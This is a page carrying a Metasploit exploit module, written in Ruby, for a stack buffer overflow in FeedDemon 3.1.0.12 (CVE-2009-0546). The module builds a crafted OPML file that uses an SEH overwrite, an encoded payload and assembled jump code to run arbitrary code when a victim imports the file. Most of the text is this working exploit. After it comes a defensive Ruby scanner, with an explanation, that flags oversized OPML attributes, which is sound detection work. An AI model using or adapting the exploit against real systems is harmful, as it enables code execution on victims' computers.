FeedDemon <= 3.1.0.12 Stack Buffer Overflow(meta)
Source: http://www.metasploit.com  Author: fl0_fl0w  Published: 2010-06-04
##
# $Id: feeddemon_opml.rb 9414 2010-06-04 00:47:14Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::FILEFORMAT
	include Msf::Exploit::Seh

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'FeedDemon <= 3.1.0.12 Stack Buffer Overflow',
			'Description'    => %q{
					This module exploits a buffer overflow in FeedDemon v3.1.0.12. When the application
				is used to import a specially crafted opml file, a buffer overflow occurs allowing
				arbitrary code execution.

				All versions are suspected to be vulnerable. This vulnerability was originally reported
				against version 2.7 in February of 2009.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'fl0 fl0w',  # Original Exploit
					'dookie',    # MSF Module
					'jduck'      # SEH + AlphanumMixed fixes
				],
			'Version'        => '$Revision: 9414 $',
			'References'     =>
				[
					[ 'CVE', '2009-0546' ],
					[ 'OSVDB', '51753' ],
					[ 'BID', '33630' ],
					[ 'URL', 'http://www.exploit-db.com/exploits/7995' ],
					[ 'URL', 'http://www.exploit-db.com/exploits/8010' ],
					[ 'URL', 'http://www.exploit-db.com/exploits/11379' ]
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space'    => 1024,
					'BadChars' => "\x0a\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xff",
					'DisableNops' => true,
					# We are not strictly limited to alphanumeric. However, currently
					# no encoder can handle our bad character set.
					'EncoderType' => Msf::Encoder::Type::AlphanumMixed,
					'EncoderOptions' =>
						{
							'BufferRegister' => 'ECX',
						},
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					# Tested OK on XPSP3 - jduck
					[ 'Windows Universal',
						{
							'Ret' => 0x00501655 # p/p/r in FeedDemon.exe v3.1.0.12
						}
					],
				],
			'Privileged'     => false,
			'DisclosureDate' => 'Feb 09 2009',
			'DefaultTarget'  => 0))

		register_options(
			[
				OptString.new('FILENAME', [ false, 'The file name.', 'msf.opml']),
			], self.class)
	end

	def exploit

		head_opml = '<opml version="1.1">'
		head_opml << '<body>'
		head_opml << '<outline text="'

		header = "\xff\xfe" # Unicode BOM
		header << Rex::Text.to_unicode(head_opml)

		foot_opml = '">'
		foot_opml << '<outline text="BKIS" title="SVRT" type="rss" xmlUrl="http://milw0rm.com/rss.php"/>'
		foot_opml << '</outline>'
		foot_opml << '</body>'
		foot_opml << '</opml>'

		footer = Rex::Text.to_unicode(foot_opml)

		# Set ECX to point to the alphamixed encoded buffer (IIIII...)
		# We use, while avoiding bad chars, an offset from SEH ptr stored on the stack at esp+8
		off = 0x1ff2
		set_ecx_asm = %Q|
			mov ecx, [esp+8]
			sub ecx, #{0x01010101 + off}
			add ecx, 0x01010101
		|
		set_ecx = Metasm::Shellcode.assemble(Metasm::Ia32.new, set_ecx_asm).encode_string

		# Jump back to the payload, after p/p/r jumps to us.
		# NOTE: Putting the jmp_back after the SEH handler seems to avoid problems with badchars..
		# 8 for SEH.Next+SEH.Func, 5 for the jmp_back itself
		distance = 0x1ffd + 8 + 5
		jmp_back = Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string

		# SEH
		seh_frame = generate_seh_record(target.ret)

		# Assemble everything together
		sploit = ''
		sploit << set_ecx
		sploit << payload.encoded
		sploit << rand_text_alphanumeric(8194 - sploit.length)
		sploit << seh_frame
		sploit << jmp_back
		sploit << rand_text_alphanumeric(8318 - sploit.length)

		# Ensure access violation reading from smashed pointer
		num = rand_text(4).unpack('V')[0]
		sploit << [num | 0x80000000].pack('V')

		evil = header + sploit + footer

		print_status("Creating '#{datastore['FILENAME']}' file ...")
		file_create(evil)

	end

end
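The module above writes a UTF-16 OPML file whose single `<outline text="...">` attribute carries more than 8 KB of raw bytes, which is the property a file-level check can key on. The following Ruby scanner is an added example, not part of the Metasploit module or of this page: it decodes an OPML file (UTF-16 with a byte-order mark, or plain UTF-8), walks every `name="value"` pair with a regex so that malformed XML is still inspected, and reports attribute values longer than a conservative limit. `MAX_ATTR_LEN`, the helper names and the constructed sample files are assumptions chosen for illustration.

```ruby
# Added example, not part of the Metasploit module above: a defender-side
# check that flags OPML files whose attribute values are far larger than any
# real feed list needs. MAX_ATTR_LEN and the helper names are assumptions.

# Assumed limit: feed titles and URLs are a few hundred characters at most,
# while the module above places over 8 KB into a single attribute.
MAX_ATTR_LEN = 1024

# Decode raw file bytes to UTF-8, honouring a UTF-16 byte-order mark (the
# module emits "\xFF\xFE" followed by UTF-16LE text). Undecodable bytes are
# replaced rather than raised on, so a malformed file is still scanned.
def decode_opml(bytes)
  data = bytes.dup.force_encoding('BINARY')
  if data.start_with?("\xFF\xFE".b)
    data[2..-1].force_encoding('UTF-16LE')
               .encode('UTF-8', invalid: :replace, undef: :replace, replace: '?')
  elsif data.start_with?("\xFE\xFF".b)
    data[2..-1].force_encoding('UTF-16BE')
               .encode('UTF-8', invalid: :replace, undef: :replace, replace: '?')
  else
    data.force_encoding('UTF-8').scrub('?')
  end
end

# Scan every name="value" pair with a plain regex rather than an XML parser,
# so a file that is not well-formed XML is still inspected. Returns one hash
# per attribute whose value exceeds +limit+ characters.
def oversized_attributes(bytes, limit = MAX_ATTR_LEN)
  text = decode_opml(bytes)
  text.scan(/([A-Za-z_:][\w:.-]*)\s*=\s*"([^"]*)"/).map { |name, value|
    { attr: name, length: value.length } if value.length > limit
  }.compact
end

# Build a constructed UTF-16LE OPML sample with a text attribute of the given
# length, mirroring the layout the module writes (BOM, outline, closing tags).
def build_sample(text_len)
  body = '<opml version="1.1"><body><outline text="' + ('A' * text_len) +
         '" title="Feed" type="rss" xmlUrl="http://example.invalid/rss"/>' +
         '</body></opml>'
  "\xFF\xFE".b + body.encode('UTF-16LE').force_encoding('BINARY')
end

if __FILE__ == $PROGRAM_NAME
  # With a path argument, scan that file; otherwise scan two constructed samples.
  inputs = if ARGV.empty?
             { 'benign' => build_sample(12), 'oversized' => build_sample(9000) }
           else
             { ARGV[0] => File.binread(ARGV[0]) }
           end
  inputs.each do |label, bytes|
    findings = oversized_attributes(bytes)
    puts "#{label}: #{findings.empty? ? 'ok' : findings.inspect}"
  end
end
```

Run it with a file path to scan that file, or with no arguments to see the benign sample pass and the 9000-character sample reported as `{:attr=>"text", :length=>9000}`. A regex rather than an XML parser is used deliberately: the payload bytes the module inserts are not valid UTF-16 text, and a strict parser would abort before reaching the attribute length.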